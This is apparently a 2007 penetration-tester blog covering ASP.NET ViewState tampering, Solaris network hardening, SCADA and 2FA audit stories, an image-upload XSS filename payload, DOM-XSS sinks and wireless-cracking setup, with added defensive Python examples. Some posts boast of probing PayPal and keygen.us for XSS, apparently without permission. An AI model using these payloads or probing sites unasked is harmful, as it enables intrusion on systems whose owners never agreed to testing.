Sunday, December 2, 2007

.NET ViewState vulnerable to manipulation exploits

This past week I had a chance to audit a customer who is using Microsoft's ViewState. So what is ViewState and why is it vulnerable? ViewState is an ASP.NET feature that persists form and control state when a page posts back to itself: ASP.NET serialises the current state of the page's controls and stores it as a base64-encoded string in a hidden form field (__VIEWSTATE). Base64 is an encoding, not encryption, so the risk is that an attacker can read these values, or modify them and post them back, to mount a variety of attacks against any server-side logic that trusts them. So, how do you view and modify the values in ViewState? PortSwigger's latest Burp proxy does the necessary decoding and manipulation. ViewState appears in the HTML source as a hidden form field and is base64 encoded.



The latest version of Burp proxy decodes the base64 ViewState and shows the contents in the clear, or you can download Fritz Onion's ViewState Decoder, which ONLY views the contents. Check out both links below:

http://www.dotnetspider.com/tools/ShowTool.aspx?ToolId=378
http://blog.portswigger.net/2007/06/viewstate-snooping.html

Because the customer is using some sort of VPN, I was unable to use PortSwigger's Burp proxy for whatever reason. However, I managed to decode the ViewState using ViewState Decoder.



To prevent attackers from manipulating ViewState, ASP.NET can append a message authentication code (MAC). A MAC is a keyed hash of the data (ASP.NET keys it with the validationKey from the machineKey configuration), so a client that does not hold the key cannot produce a valid MAC for modified data, and the server rejects a tampered field. You can enable the ViewState MAC at the machine, application or page level, wherever you configure ViewState, with this attribute:
enableViewStateMac="true"
It is on by default in ASP.NET and should never be switched off. Note that a MAC only protects integrity: the contents remain base64 and can be read by anyone who sees the page.

To hide the contents as well, encrypt ViewState by setting the viewStateEncryptionMode property to Always (it is an enumeration with values Auto, Always and Never, not a boolean). This prevents attackers from decoding and viewing the data inside ViewState. MAC and encryption together cover integrity and confidentiality; to stop a ViewState captured from one user being replayed by another, also set Page.ViewStateUserKey so the MAC is tied to the user's session. To read more about ViewState security, check out the MSDN links below:

http://msdn2.microsoft.com/en-us/library/ms178199.aspx
http://msdn.microsoft.com/msdnmag/issues/03/02/CuttingEdge/
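The integrity and confidentiality points above, as an added example (not code from the original post or from ASP.NET): a simplified model of a ViewState field in Python, with JSON standing in for ASP.NET's binary LOS serialisation format and HMAC-SHA256 standing in for the machineKey validation algorithm. The key and the form values are constructed for the example. It shows that base64 hides nothing, that an attacker can rewrite an unprotected field and have the server accept it, and that a keyed MAC makes the server reject the rewritten field while still leaving the contents readable (which is why encryption is a separate setting).

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Stand-in for the machineKey validationKey; constructed for this example.
# A real key is long, random and never leaves the server.
VALIDATION_KEY = b"example-validation-key-not-a-real-secret"
MAC_LEN = hashlib.sha256().digest_size  # 32 bytes


def encode_viewstate(state: dict, key: Optional[bytes] = None) -> str:
    """Serialise control state into the hidden-field form.

    JSON stands in for ASP.NET's binary LOS format. With a key, an
    HMAC-SHA256 of the payload is appended, which is the effect of
    enableViewStateMac="true" (ASP.NET uses the machineKey validation
    key and algorithm rather than this exact construction).
    """
    payload = json.dumps(state, sort_keys=True).encode()
    if key is not None:
        payload += hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload).decode()


def peek_viewstate(vs: str) -> dict:
    """What a ViewState decoder (or an attacker) sees: base64 is not
    encryption, so the contents are readable with or without a MAC."""
    raw = base64.b64decode(vs)
    try:
        return json.loads(raw)
    except ValueError:
        return json.loads(raw[:-MAC_LEN])  # drop the trailing MAC, read the rest


def tamper(vs: str, field: str, value) -> str:
    """Attacker rewrites one field and re-encodes the state. Without the
    validation key the attacker cannot recompute a valid MAC."""
    state = peek_viewstate(vs)
    state[field] = value
    return encode_viewstate(state)


def load_viewstate_unprotected(vs: str) -> dict:
    """Server side with enableViewStateMac="false": trusts whatever arrives."""
    return peek_viewstate(vs)


def load_viewstate(vs: str, key: bytes) -> dict:
    """Server side with enableViewStateMac="true": verify before trusting."""
    raw = base64.b64decode(vs)
    payload, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # constant-time comparison so the check does not leak the MAC byte by byte
    if len(raw) <= MAC_LEN or not hmac.compare_digest(mac, expected):
        raise ValueError("ViewState MAC validation failed")
    return json.loads(payload)


def demo():
    """Return (state accepted without MAC, genuine state with MAC, tamper rejected)."""
    state = {"price": "49.90", "is_admin": False}  # constructed form values

    unprotected = encode_viewstate(state)
    accepted = load_viewstate_unprotected(tamper(unprotected, "price", "0.01"))

    protected = encode_viewstate(state, VALIDATION_KEY)
    try:
        load_viewstate(tamper(protected, "price", "0.01"), VALIDATION_KEY)
        rejected = False
    except ValueError:
        rejected = True
    return accepted, load_viewstate(protected, VALIDATION_KEY), rejected


if __name__ == "__main__":
    tampered, genuine, rejected = demo()
    print("no MAC, server accepted:", tampered)
    print("MAC, genuine state:", genuine)
    print("MAC, tampered state rejected:", rejected)
    print("MAC on, contents still readable:",
          peek_viewstate(encode_viewstate({"x": 1}, VALIDATION_KEY)))
```

In ASP.NET the equivalent of load_viewstate happens for you once the MAC is enabled; the point of the model is that the MAC is keyed, so anyone who can see the hidden field can still read the values (hence viewStateEncryptionMode) but cannot forge a field the server will accept.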

The Hacka Man

Sunday, November 25, 2007

Old School Oracle Auditing

I was again reading hacking articles and one of them, "Simple Oracle Auditing", caught my attention. Well, it's an old article but it's still fun to read and learn from the gurus. Check it out guys: http://www.securityfocus.com/infocus/1689

The Hacka Man

Thursday, November 22, 2007

7 steps to better Solaris Network Settings

I was auditing one of our customers again and this time round, I managed to come up with a 7 step guide to better secure the TCP/IP stack on Solaris. Well, you guys can add more.

1. Configure more random TCP initial sequence number generation, so connections are harder to spoof or hijack. Check that in /etc/default/inetinit TCP_STRONG_ISS is set to 2 (the RFC 1948 method), for instance: TCP_STRONG_ISS=2

2. Turn IP forwarding off to prevent the machine acting as a router. On Solaris 9 and earlier, forwarding is disabled at boot when the file /etc/notrouter is present; if the file is missing, create it with: touch /etc/notrouter (on Solaris 10 use routeadm -d ipv4-forwarding -d ipv6-forwarding followed by routeadm -u). The ndd settings in step 3 turn it off for the running kernel as well.

To prevent dynamic route updates via the network, move in.routed and in.rdisc out of /usr/sbin (the destination below is the author's own staging directory) with the following commands:
mv /usr/sbin/in.routed /export/home/cfgh/base
mv /usr/sbin/in.rdisc /export/home/cfgh/base

3. Change the default kernel IP settings for better security. These tunables are set with ndd(1M) and are lost at reboot, so they are applied from an rc2.d script. Follow these steps:

Set up the files and environment:
touch /etc/init.d/exconfig
ln -s /etc/init.d/exconfig /etc/rc2.d/S70exconfig
chmod 744 /etc/init.d/exconfig /etc/rc2.d/S70exconfig

Edit the file /etc/init.d/exconfig and add the following lines (the release functions are cumulative: Solaris 8, 9 and 10 get the IPv4 set from release7 plus the IPv6 set from release8):
#!/bin/sh
# /etc/init.d/exconfig - apply hardened IP, TCP and ARP tunables at boot
RELEASE=`/usr/bin/uname -r`
NDD=/usr/sbin/ndd

release7 ()
{
    # Do not route, and only accept packets on the interface that owns the address
    $NDD -set /dev/ip ip_forwarding 0
    $NDD -set /dev/ip ip_strict_dst_multihoming 1
    # Neither send nor honour ICMP redirects (redirects can re-route our traffic)
    $NDD -set /dev/ip ip_send_redirects 0
    $NDD -set /dev/ip ip_ignore_redirect 1
    # Drop source-routed packets and directed broadcasts (smurf amplification)
    $NDD -set /dev/ip ip_forward_src_routed 0
    $NDD -set /dev/ip ip_forward_directed_broadcasts 0
    $NDD -set /dev/ip ip_respond_to_echo_broadcast 0
    # SYN flood resistance: deeper half-open queue, 60 s connect abort timer
    $NDD -set /dev/tcp tcp_conn_req_max_q0 4096
    $NDD -set /dev/tcp tcp_ip_abort_cinterval 60000
    # Do not answer ICMP timestamp and address-mask probes (used for fingerprinting)
    $NDD -set /dev/ip ip_respond_to_timestamp 0
    $NDD -set /dev/ip ip_respond_to_timestamp_broadcast 0
    $NDD -set /dev/ip ip_respond_to_address_mask_broadcast 0
    # Expire ARP cache entries after 60 s to limit the life of poisoned entries
    $NDD -set /dev/arp arp_cleanup_interval 60000
    # Site-specific: longer TCP keepalive where an mqm account exists
    id -a mqm > /dev/null 2>&1
    if [ $? -eq 0 ]
    then
        $NDD -set /dev/tcp tcp_keepalive_interval 600000
    fi
}

release8 ()
{
    # Same policy for the IPv6 stack, plus a 60 s IRE/ARP refresh interval
    $NDD -set /dev/ip ip6_forwarding 0
    $NDD -set /dev/ip ip6_strict_dst_multihoming 1
    $NDD -set /dev/ip ip6_send_redirects 0
    $NDD -set /dev/ip ip6_ignore_redirect 1
    $NDD -set /dev/ip ip6_forward_src_routed 0
    $NDD -set /dev/ip ip_ire_arp_interval 60000
}

release6 ()
{
    # Reduced set applied on Solaris 2.6
    $NDD -set /dev/ip ip_respond_to_echo_broadcast 0
    $NDD -set /dev/ip ip_forward_directed_broadcasts 0
    $NDD -set /dev/ip ip_strict_dst_multihoming 1
    $NDD -set /dev/ip ip_ignore_redirect 1
    $NDD -set /dev/ip ip_forward_src_routed 0
}

if [ "$RELEASE" = "5.7" ]
then
    release7
elif [ "$RELEASE" = "5.8" ] || [ "$RELEASE" = "5.9" ] || [ "$RELEASE" = "5.10" ]
then
    release7
    release8
elif [ "$RELEASE" = "5.6" ]
then
    release6
fi

4. Disable multicast on the server: edit the file /etc/rc2.d/S72inetsvc and comment out or remove the following lines (shown here commented out):
#(
#if [ "$_INIT_NET_STRATEGY" = "dhcp" ]; then
#    mcastif=`/sbin/dhcpinfo Yiaddr` || mcastif=$_INIT_UTS_NODENAME
#else
#    mcastif=$_INIT_UTS_NODENAME
#fi
#
#echo "Setting default IPv4 interface for multicast:" \
#    "add net 224.0/4: gateway $mcastif"
#
#/usr/sbin/route -n add -interface "224.0/4" "$mcastif" >/dev/null
#)&

For Solaris 10
Multicast is disabled by the /etc/rc2.d/S72inetsvc-os10 script created in step 6, which deletes the 224.0/4 route instead.

5. Denial of Service prevention: system settings.
Disable the following inetd services on all servers unless a business function requires them: ftp-data, ftp, tftp, pop2, pop3, pop-2, nntp, chargen, daytime, discard, echo, finger, talk, who, whois, new-rwho, klogin, eklogin, telnet, systat, netstat, time. They are listed in /etc/services; the clean way to switch them off is to comment out their entries in /etc/inetd.conf and restart inetd (on Solaris 10, disable the corresponding SMF instance with inetadm -d or svcadm disable). chargen, echo, daytime and discard are classic UDP loop and amplification targets, and telnet, ftp and the pop services carry credentials in the clear.

6. Prevent core dumps from inetd, as a core file may contain login information. Edit the file /etc/rc2.d/S72inetsvc and change the line:
/usr/sbin/inetd -s &
to:
/usr/bin/ulimit -c 0; /usr/sbin/inetd -s -t &
Note:
ulimit -c 0 : sets the core file size limit to 0 bytes for inetd and everything it spawns
inetd -s -t : stand-alone server with tracing (syslog logging) of all TCP connections

For Solaris 10
inetd runs under SMF, so create the script /etc/rc2.d/S72inetsvc-os10 as below (it also performs the multicast step from step 4):
# cat /etc/rc2.d/S72inetsvc-os10
#!/bin/sh
# Remove the default multicast route, then start inetd with TCP connection tracing
IPADDR=`netstat -nr | grep -w 224.0.0.0 | awk '{print $2}'`
/usr/sbin/route -n delete -interface "224.0/4" $IPADDR
/usr/sbin/svcadm enable inetd
/usr/sbin/inetadm -M tcp_trace=TRUE
# chmod 555 /etc/rc2.d/S72inetsvc-os10

7. .netrc files: system settings. .netrc files (in root's home directory or any user's) store FTP hostnames, usernames and passwords in clear text and are not permitted. Find and remove any that exist:
find / -name .netrc -print
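The seven steps above are set once; what a practitioner also wants is a check that the settings are still in place after the next patch or reboot. The following is an added audit script, not part of the original guide: it reads each tunable with ndd(1M), the same tool the exconfig script uses to set them, compares it against the values that script applies, and also checks the TCP_STRONG_ISS line from step 1. The sample ndd output and /etc/default/inetinit contents at the bottom are constructed so the script can be exercised away from a Solaris host; ndd_get is the only part that needs the real system.

```python
import subprocess
from typing import Callable, Dict, List, Tuple

# Values the exconfig script above sets for Solaris 8 and later (IPv4 + IPv6).
EXPECTED: Dict[str, Dict[str, str]] = {
    "/dev/ip": {
        "ip_forwarding": "0",
        "ip_strict_dst_multihoming": "1",
        "ip_send_redirects": "0",
        "ip_ignore_redirect": "1",
        "ip_forward_src_routed": "0",
        "ip_forward_directed_broadcasts": "0",
        "ip_respond_to_echo_broadcast": "0",
        "ip_respond_to_timestamp": "0",
        "ip_respond_to_timestamp_broadcast": "0",
        "ip_respond_to_address_mask_broadcast": "0",
        "ip6_forwarding": "0",
        "ip6_strict_dst_multihoming": "1",
        "ip6_send_redirects": "0",
        "ip6_ignore_redirect": "1",
        "ip6_forward_src_routed": "0",
        "ip_ire_arp_interval": "60000",
    },
    "/dev/tcp": {
        "tcp_conn_req_max_q0": "4096",
        "tcp_ip_abort_cinterval": "60000",
    },
    "/dev/arp": {
        "arp_cleanup_interval": "60000",
    },
}

Finding = Tuple[str, str, str, str]  # driver, parameter, expected, actual


def ndd_get(driver: str, param: str) -> str:
    """Read the live value with ndd(1M); run as root on the Solaris host."""
    out = subprocess.run(["/usr/sbin/ndd", driver, param],
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def audit_tunables(get_value: Callable[[str, str], str],
                   expected: Dict[str, Dict[str, str]] = EXPECTED) -> List[Finding]:
    """Compare every expected tunable with what get_value reports."""
    drift: List[Finding] = []
    for driver, params in expected.items():
        for param, want in params.items():
            try:
                have = get_value(driver, param).strip()
            except Exception as exc:  # an unreadable parameter is a finding too
                have = "ERROR: %s" % exc
            if have != want:
                drift.append((driver, param, want, have))
    return drift


def tcp_strong_iss_ok(inetinit_text: str) -> bool:
    """Step 1: the last uncommented TCP_STRONG_ISS assignment must be 2."""
    value = None
    for line in inetinit_text.splitlines():
        line = line.strip()
        if line.startswith("TCP_STRONG_ISS="):
            value = line.split("=", 1)[1].strip().strip('"')
    return value == "2"


# --- constructed sample of a host where three settings were never applied ---
SAMPLE_NDD = {
    ("/dev/ip", "ip_forwarding"): "1",
    ("/dev/ip", "ip_send_redirects"): "1",
    ("/dev/tcp", "tcp_conn_req_max_q0"): "1024",
}


def sample_get(driver: str, param: str) -> str:
    """Offline stand-in for ndd_get; everything not in SAMPLE_NDD is compliant."""
    return SAMPLE_NDD.get((driver, param), EXPECTED[driver][param])


SAMPLE_INETINIT = "# /etc/default/inetinit (constructed)\nTCP_STRONG_ISS=1\n"


if __name__ == "__main__":
    for driver, param, want, have in audit_tunables(sample_get):
        print("DRIFT %s %s: expected %s, got %s" % (driver, param, want, have))
    print("TCP_STRONG_ISS ok:", tcp_strong_iss_ok(SAMPLE_INETINIT))
    # On the host itself: audit_tunables(ndd_get) and
    # tcp_strong_iss_ok(open("/etc/default/inetinit").read())
```

Run it from cron or after every patch cycle; a drift line for ip_forwarding or ip_send_redirects means the rc2.d script did not run, or something later in the boot reset the value.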

The Hacka Man

Wednesday, November 21, 2007

Hacking Iphone the fun way

I got my iPhone and I know there are exploits and vulnerabilities in it discovered by H.D. Moore, creator of Metasploit. However, I wasn't too enthusiastic about the damage that this exploit can do, but more into the fun aspect of how to install new 3rd party applications on the phone. I know that you can install hacking tools too, but that's not my goal. Why install those tools when you can install them on the PC? Anyway, I managed to unlock the phone with a little help and of course started using it. It is the coolest phone out on the planet and of course, with the video below, I managed to install more applications on my phone. Check it out.



The Hacka Man

Tuesday, November 20, 2007

Hacking SCADA

While I was in Dubai, I got a chance to visit one of our customers who was using SCADA. Back then, it was so new to me and I had no idea how to actually audit it. Back here in Singapore, I got another chance to actually test and audit SCADA systems and this time round, I found a way to actually break the application and network apart. However, I had to be very careful during the audit, as one wrong move could affect the whole of Singapore.

So what is SCADA? SCADA stands for Supervisory Control and Data Acquisition, and these are the systems that control the delivery of water, power, gas and other utilities to your home. Check out http://en.wikipedia.org/wiki/SCADA if you would like to read more about it. There have been incidents where SCADA systems were hacked and information was stolen by terrorists, and internet worms like Slammer have also reached these systems and caused a total DoS. Why is all this happening? All I can say is that either those systems are exposed to the internet, or they use proprietary protocols and their owners think that makes them safe from hackers and don't care about it. Those people working in SCADA are so wrong; they don't bother about security at all, and I guess it is only when something disturbing happens that they start to panic and need people like us to audit their systems.

SCADA environments speak industrial protocols like DNP3, OPC and Modbus (DCS, a distributed control system, is an architecture rather than a protocol), most of which were designed without authentication or encryption, and it is possible to use Wireshark to monitor the traffic and see how the handshaking process works. By observing the handshake, I realised that it was possible to perform man-in-the-middle attacks, although that would of course require developing some tools to do the job. Other possible attacks include DoS, capturing of usernames and passwords, injecting worms and viruses and many other old school techniques.

The problems with SCADA:
1. Windows & Linux Vulnerabilities
2. Not patched regularly – maximum uptime needed
3. Denial of Service Attack
4. Continuous string of reboot command
5. No Authentication
6. No Accounting
7. Traffic sent in clear text (username & password)
8. No encryption

To Pentest on SCADA systems, you can do the following:
1. Port Scanning
2. OS Fingerprinting
3. Vulnerability Scanning
4. Exploitation
5. Credentials Guessing
6. Sniffing
7. Fuzzing

Of course there are many other possibilities for pentesting SCADA systems. I for sure want another session with SCADA because it is so much fun touching mission-critical systems that can affect the whole country. There are tons of possibilities and problems with SCADA and I have just outlined a few obvious ones. Of course, you have to be in the SCADA environment if you actually want to discover more, but then again, do we get such chances every day?

The Hacka Man

Monday, November 19, 2007

Two factor authentication bypassed

It has been a long fortnight and I have not finished writing my reports for various banks. There were really that many reports to write, especially for one particular bank. I managed to bypass the security control mechanism set up by this bank and steal the username and password of any user.

Most of the banks here in Singapore practise two factor authentication and most people think that it is secure because of the extra layer of security. However, a PoC was released to the bank showing them that it was possible to bypass the security control mechanism and capture the username and password of any user. I am sorry guys, I am not supposed to leak any information here; it is very sensitive from the bank's point of view. The best part of the exploit was that there was no XSS or SQL injection or any other sort of vulnerability that facilitated it. It was purely information gathered during the passive information gathering exercise.

I was browsing their site and discovered a section where some information could help me facilitate the research of writing the exploit. I had an albeit pedantic thought when I saw that particular section: with all that information, I was definitely able to bypass the security mechanism. However, to do that I would require someone else to write the code for me from my ideas. Nevertheless, within a week I managed to come out with a PoC and give a great demonstration. Guys, I know you want to know the details, but I simply can't reveal anything because of the Non Disclosure Agreement I signed. All I can say is that passive information gathering is a very important exercise when trying to attack a huge organization; guys can spend hours and days writing a cool exploit, while with me, all I needed was careful observation and I got the results I wanted with ease. Why bother going all the way to do something difficult when something easy can be accomplished faster?

I would love to attach a screenshot of what I managed to capture, but then again, it is too sensitive. I am sorry, but just know that it is possible to bypass 2FA.

The Hacka Man

Saturday, November 17, 2007

Image upload xss

Also, I stumbled across an old blog post by RSnake where it was possible to execute XSS through an upload function.

http://ha.ckers.org/blog/20070603/image-upload-xss/

http://pstgroup.blogspot.com/2007/06/tipsimage-upload-xss.html

An example of something you might test for: the application stores the uploaded file under its original name and then builds an <img> tag whose src is the upload path plus that name. So you upload a file named "onerror="alert('XSS')"a=".jpg, which ends up at:

http://ha.ckers.org/image-xss/"onerror="alert('XSS')"a=".jpg

This ends up making the page look like:

<img src="http://ha.ckers.org/image-xss/"onerror="alert('XSS')"a=".jpg">

The double quote in the filename closes the src attribute, onerror becomes a second attribute, and because the src no longer points at an image the browser fires the handler. The real issue is not the extension check but that the filename is placed in an HTML attribute unescaped.

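The break-out above, as an added Python example (my code, not RSnake's or the original post's): the vulnerable way of building the <img> tag next to two fixes, attribute-escaping the value and, better, refusing to reuse the uploaded name at all. The filename is the one from the post; the base URL and the server-side naming scheme (a uuid plus whitelisted extension) are assumptions for the example.

```python
import html
import re
import uuid

# The upload name from the post: a double quote closes src, then a new attribute opens.
EVIL_NAME = '"onerror="alert(\'XSS\')"a=".jpg'
BASE_URL = "http://ha.ckers.org/image-xss/"  # from the post; any upload path works

ATTR_RE = re.compile(r'\b[a-z]+="')  # counts name=" attribute openers in a tag


def img_tag_vulnerable(base_url: str, filename: str) -> str:
    """Concatenates the raw filename into the attribute; this is the bug."""
    return '<img src="%s%s">' % (base_url, filename)


def img_tag_escaped(base_url: str, filename: str) -> str:
    """Fix 1: HTML-escape the attribute value (quote=True also escapes ' and ")."""
    return '<img src="%s">' % html.escape(base_url + filename, quote=True)


SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)$")


def accept_upload_name(filename: str) -> bool:
    """Fix 2a: whitelist the characters and extension of user-supplied names."""
    return SAFE_NAME.match(filename) is not None


def stored_name(filename: str) -> str:
    """Fix 2b (preferred): never reuse the client's name. Keep only a whitelisted
    extension and generate the rest server-side (uuid is an assumed scheme)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ("jpg", "jpeg", "png", "gif"):
        raise ValueError("unsupported image type")
    return "%s.%s" % (uuid.uuid4().hex, ext)


def attribute_count(tag: str) -> int:
    """How many attributes the browser will see; >1 on an <img src> means break-out."""
    return len(ATTR_RE.findall(tag))


if __name__ == "__main__":
    bad = img_tag_vulnerable(BASE_URL, EVIL_NAME)
    good = img_tag_escaped(BASE_URL, EVIL_NAME)
    print(bad, attribute_count(bad))
    print(good, attribute_count(good))
    print("accept original name:", accept_upload_name(EVIL_NAME))
    print("stored as:", stored_name(EVIL_NAME))
```

The attribute count is a crude stand-in for what the HTML parser will do; the real test is RSnake's: upload the file and see whether the handler runs. Escaping fixes this one sink, but the uploaded name may be echoed in other places (directory listings, download headers, log viewers), which is why generating the stored name server-side is the stronger fix.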

The Hacka Man

DOM Based XSS

I was reading Amit Klein's 2005 article on DOM Based XSS and he mentions a few things to look out for. In that article, he gives an insight into how to look for potential XSS in the DOM and why sanitising on the client side is important.

The full article is here: http://www.webappsec.org/projects/articles/071105.html

Below is a snippet:

2. Analyzing and hardening the client side (Javascript) code. Reference to DOM objects that may be influenced by the user (attacker) should be inspected, including (but not limited to):

document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
Note that a document object property or a window object property may be referenced syntactically in many ways - explicitly (e.g. window.location), implicitly (e.g. location), or via obtaining a handle to a window and using it (e.g. handle_to_some_window.location).

Special attention should be given to scenarios wherein the DOM is modified, either explicitly or potentially, either via raw access to the HTML or via access to the DOM itself, e.g. (by no means an exhaustive list, there are probably various browser extensions):

Write raw HTML, e.g.:
document.write(…)
document.writeln(…)
document.body.innerHtml=…
Directly modifying the DOM (including DHTML events), e.g.:
document.forms[0].action=… (and various other collections)
document.attachEvent(…)
document.create…(…)
document.execCommand(…)
document.body. … (accessing the DOM through the body object)
window.attachEvent(…)
Replacing the document URL, e.g.:
document.location=… (and assigning to location’s href, host and hostname)
document.location.hostname=…
document.location.replace(…)
document.location.assign(…)
document.URL=…
window.navigate(…)
Opening/modifying a window, e.g.:
document.open(…)
window.open(…)
window.location.href=… (and assigning to location’s href, host and hostname)
Directly executing script, e.g.:
eval(…)
window.execScript(…)
window.setInterval(…)
window.setTimeout(…)
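Klein's list is a code-review checklist; as an added example (my code, not Klein's or the original post's), here is a small Python triage script that applies it: it flags any line of client-side JavaScript where one of the listed sources appears on the same line as one of the listed sinks. The JavaScript it scans is constructed for the example and is modelled on the document.URL / document.write pattern from Klein's article. It is a line-by-line pattern match, not a taint analysis, so a source copied into a variable and used in a sink on a later line (as with location.hash in the sample) is not flagged; treat hits as places to read, not proof of a bug.

```python
import re
from typing import List, Tuple

# Sources Klein lists as attacker-influenced (longer names first so that
# document.URLUnencoded is not reported as document.URL).
SOURCES = [
    ("document.URLUnencoded", re.compile(r"document\.URLUnencoded\b")),
    ("document.URL", re.compile(r"document\.URL\b")),
    ("document.location", re.compile(r"document\.location\b")),
    ("document.referrer", re.compile(r"document\.referrer\b")),
    ("window.location", re.compile(r"window\.location\b")),
    ("location", re.compile(r"(?<![\w.])location\b")),  # bare/implicit reference
]

# Sinks from the same list: raw HTML writes, script execution, URL replacement.
SINKS = [
    ("document.writeln", re.compile(r"document\.writeln\s*\(")),
    ("document.write", re.compile(r"document\.write\s*\(")),
    ("innerHTML", re.compile(r"\.innerHTML\s*=")),
    ("eval", re.compile(r"\beval\s*\(")),
    ("setTimeout", re.compile(r"\bsetTimeout\s*\(")),
    ("setInterval", re.compile(r"\bsetInterval\s*\(")),
    ("execScript", re.compile(r"\bexecScript\s*\(")),
    ("location.href=", re.compile(r"location\.href\s*=[^=]")),
    ("window.open", re.compile(r"\bwindow\.open\s*\(")),
]

Finding = Tuple[int, str, str]  # line number, source, sink


def scan_js(js: str) -> List[Finding]:
    """Report lines where a listed source and a listed sink co-occur."""
    findings: List[Finding] = []
    for lineno, line in enumerate(js.splitlines(), start=1):
        source = next((name for name, rx in SOURCES if rx.search(line)), None)
        sink = next((name for name, rx in SINKS if rx.search(line)), None)
        if source and sink:
            findings.append((lineno, source, sink))
    return findings


# Constructed sample: line 2 is the classic pattern from Klein's article,
# line 6 evaluates the query string, line 4 reaches a sink only through a
# variable set on line 3 (a real bug this per-line check does not see).
SAMPLE_JS = """\
var pos = document.URL.indexOf("name=") + 5;
document.write(document.URL.substring(pos, document.URL.length));
var q = location.hash.slice(1);
document.getElementById("out").innerHTML = q;
document.getElementById("out").textContent = q;
eval(window.location.search.substring(1));
"""


if __name__ == "__main__":
    for lineno, source, sink in scan_js(SAMPLE_JS):
        print("line %d: %s flows into %s" % (lineno, source, sink))
```

For line 2 the fix Klein gives is to validate the extracted value against a strict pattern (for example letters and digits only) before writing it, or to put it in the page through a text node instead of document.write; line 4 is why the sink list matters on its own even when no source is visible nearby, since innerHTML with any attacker-reachable variable is the same bug.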

The Hacka Man

Friday, November 16, 2007

Deadly execution in huge Financial Company

I was auditing one of the biggest financial companies in the world and here in the Singapore branch, it was just really bad. I was playing around with the software and noticed an upload function. With evil thoughts in my mind, I quickly wanted to see if this application allowed uploading of exe, bat or other executable files. To my wildest surprise, it did allow the uploading of exe files and I tell you, I could upload any sort of trojan or virus and execute it on the client's PC. I actually did upload an exe program and tried executing it on the client's PC, and it executed smoothly with no protection on the client's PC. It was really just bad. Moreover, the application itself also allowed command execution through the query string, which was a real eye opener. It was just a lucky day for my audit and an unlucky day for the customer. The report has been submitted; let's hope they rectify the problems to avoid any attacks.

Check out my next post on a Two Factor Authentication man-in-the-middle attack PoC.

The Hacka Man

Thursday, November 15, 2007

Basics of Mod_Security

This past week, I was auditing a customer's web server defence against web attacks and realised that they had not installed mod_security as one of the modules on the server. Considering it is a huge customer, they should at least do some basic filtering with mod_security, since their servers run on Linux. I mentioned mod_security in my previous post; for those who are still not sure what it is, mod_security is a web application firewall implemented as an Apache web server add-on module that provides intrusion detection, content filtering and web-based attack protection. It is good at detecting and stopping many known web attacks, such as many SQL injection attacks, cross-site scripting, directory traversal and many others. Below is a snippet of a simple basic mod_security configuration, in the ModSecurity 1.x (SecFilter) directive syntax:


# Turn the filtering engine On or Off
SecFilterEngine On

# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On

# Unicode encoding check
SecFilterCheckUnicodeEncoding On

# Only allow bytes from this range
SecFilterForceByteRange 0 255

# Only log actionable requests
SecAuditEngine RelevantOnly

# The name of the audit log file
SecAuditLog /var/log/apache2/audit_log

# Debug level set to a minimum
SecFilterDebugLog /var/log/apache2/modsec_debug_log
SecFilterDebugLevel 2

# Should mod_security inspect POST payloads
SecFilterScanPOST On

# By default log and deny suspicious requests
# with HTTP status 500
SecFilterDefaultAction "deny,log,status:500"

# Add custom secfilter rules here


Of course, you can add more rules; it depends on what you need it to filter and protect. Two things to check before pasting this in: the SecFilter* directives above belong to ModSecurity 1.x, and ModSecurity 2.x replaced them with SecRuleEngine, SecRule and SecDefaultAction, so confirm which version the server runs; and SecFilterForceByteRange 0 255 accepts every byte value, so tighten it (for example 32 126) if the application only handles printable ASCII. Mod_Security does come with a performance cost; however, the security benefit far outweighs it. Do consider using it.

The Hacka Man

No hacking activites

Been really busy with all the results I got from my projects and pretty occupied with report writing. I am handling a few projects currently and well, there isn't any time for me to research or perform any sort of testing or hacking. This is good in the sense that it keeps me busy and at least I feel "useful" to my company, since I am performing audits for our customers during this peak period. I will definitely get back into hacking mode soon; check back for more cool ill street hacking. As of blogging now, I am still writing long unfinished reports. Reports are piling up if I don't start doing them. Till then, stay tuned for my next installment.

The Hacka Man

Monday, November 5, 2007

SAP hacking Oracle?????

This is one of the biggest pieces of news I have ever heard of: SAP hacking Oracle. That is totally shocking but at the same time funny. Big organizations are fighting and competing with each other to secure their position in the software market. I am for once happy that SAP got into trouble. Well, the news is spreading like fire over the internet. Check out the two sites below, and of course you can Google for more.

http://www.theinquirer.net/en/inquirer/news/2007/07/03/red-faced-sap-admits-hacking-oracle

http://blogs.zdnet.com/threatchaos/?p=450



The Hacka Man

Friday, November 2, 2007

keygen.us XSS

I was again playing around with XSS, this time on one of the biggest cracking sites, keygen.us. Well, I tried some basic XSS and it didn't work as they do some input validation and escaped my input characters. It got me pumped up and I wanted an XSS on their site. In the end, with a little help, I managed to get an XSS on their site, and one of the vectors includes Mario's exploit. It was an overall learning experience for me and an exciting one. Check it out:






The Hacka Man

Thursday, November 1, 2007

Paypal CRMgateway XSS

PayPal used to suffer a lot from phishing attacks in the past and I bet even today, the bad guys are finding ways to exploit holes like this to get more money. I was again playing around and managed to find an XSS hole in PayPal's CRM gateway. Well, it seems like PayPal never learned their lesson from the past and still allows injection. Anyway, I had already cancelled my account with PayPal because of their bad service and the unforgivable mistake they made. Good luck PayPal.



The Hacka Man

Hacking and Cracking Wireless

One day after intruding into the router, I remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and captured the commands needed while doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands; it comes in very handy when doing a wireless audit and saves you the time needed to read the manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 <channel>


NetGear WG511T

